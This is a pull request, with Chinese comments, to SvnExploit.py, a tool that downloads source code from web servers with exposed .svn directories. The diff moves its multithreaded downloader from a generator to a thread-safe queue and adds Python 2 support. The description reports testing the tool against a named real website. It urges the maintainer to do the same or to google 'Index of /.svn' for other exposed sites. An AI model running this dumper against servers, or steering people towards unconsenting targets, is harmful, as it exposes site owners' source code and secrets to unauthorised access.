### PR TITLE
[+]优化:1.Generator改用queue 2.兼容Py2

### DIFF
--- a/SvnExploit.py
+++ b/SvnExploit.py
@@ -14,6 +14,12 @@ header={'accept':'text/html,application/xhtml+xml,application/xml',
         'user-agent':'Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Mobile Safari/537.36',
         'referer':'http://baidu.com'}
 table_dump = ''
+if sys.version_info < (3, 0): # 兼容py2和py3
+    import Queue as queue
+else:
+    import queue
+
+download_queue = queue.Queue()
 
 # 下载wc.db
 def download_db(url):
@@ -68,23 +74,19 @@ def print_values(values):
     table.reversesort = True
     print(table)
 
-# 生成器 存放values中的记录，供下载源码使用
-def Gen_values(values):
+# 用queue存放values中的记录，供下载源码使用
+def gen_queue(values):
+    global download_queue
     for v in values:
         if v[0]:
-            yield v
+            download_queue.put(v)
 
-
-def down_file(url,db_path,Gen_value):
+def down_file(url,db_path):
     # 获取下载后保存的本地地址
     path = os.path.dirname(db_path) # dbs/127.0.0.1
 
-    # 取出生成器中的记录
-    while True:
-        try:
-            value = Gen_value.__next__()
-        except:
-            break
+    while not download_queue.empty(): # 如果queue不为空
+        value = download_queue.get()
         #print(value)
         #sys.exit()
         if value[1]=="dir":
@@ -119,6 +121,7 @@ def down_file(url,db_path,Gen_value):
                 file.write(res.content)
                 #global table_dump
                 table_dump.add_row([value[0], file_uri, '下载成功'])
+        download_queue.task_done() # 通知队列已消费完该任务
 
 def banner():
     print(""" ____             _____            _       _ _   
@@ -142,16 +145,18 @@ def svnMoreThan1_7(url,isdump):
         print_values(values)
     else:
         global table_dump
+        global download_queue
         table_dump = PrettyTable(['文件名','URL','下载状态'])
-        Gen_value = Gen_values(values)
+        print_values(values)
+        gen_queue(values)
         threads = []
         for i in range(options.thread_num):
-            thread = threading.Thread(target=down_file, args=(url, db_path, Gen_value))
+            thread = threading.Thread(target=down_file, args=(url, db_path,))
             thread.start()
             threads.append(thread)
         for thread in threads:
             thread.join()
-        print(table_dump)
+
         print("[+] 已经Dump完成!")
 
 def SvnVersion(url):


### PR DESCRIPTION
# 1. Generator改用queue

一开始我是用py2跑的,我测试的是`https://theora.org/.svn`,下载svn版本大于1.7的时候有问题。
并不能成功下载完所有文件,只是下了一个`wc.db`数据库文件
![](https://ws2.sinaimg.cn/large/006tNc79ly1fz1x7abgtnj305v014749.jpg)

看了一下线程的运行图,很快就结束了

![](https://ws1.sinaimg.cn/large/006tNc79ly1fz1x8wepxrj30nr03wdgc.jpg)

查了下资料,参考链接: [multithreading: Why aren't generators thread-safe? What happens when it is shared among threads?](https://stackoverflow.com/questions/20043472/multithreading-why-arent-generators-thread-safe-what-happens-when-it-is-share)

可能是因为`Generator`是线程不安全的导致的,然后我就改成`thread-safe`的`queue`来存放待下载的文件。

您不妨可以测测该站点,或者google hack一下:`Index of /.svn`找到别的svn版本大于1.7的站点

# 2.兼容py2

因为我用py2多呀.hhhh